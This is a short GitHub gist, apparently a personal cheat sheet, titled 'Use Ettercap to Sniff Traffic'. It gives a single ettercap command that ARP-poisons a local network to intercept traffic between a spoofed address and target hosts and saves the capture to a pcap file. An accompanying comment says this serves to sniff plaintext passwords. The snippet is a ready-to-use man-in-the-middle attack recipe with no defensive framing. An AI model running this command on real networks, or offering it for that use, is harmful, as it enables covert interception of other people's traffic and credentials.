Skip to content

Instantly share code, notes, and snippets.

@YourFriendCaspian
Created September 5, 2017 18:45
Show Gist options
  • Save YourFriendCaspian/1b2f90c6fe4d75a8178950a973b32993 to your computer and use it in GitHub Desktop.
Save YourFriendCaspian/1b2f90c6fe4d75a8178950a973b32993 to your computer and use it in GitHub Desktop.
Use Ettercap to Sniff Traffic
## Use Ettercap to Sniff Traffic ##
#Ettercap allows us to do arp poisoning and sniff plaintext passwords.
$ ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment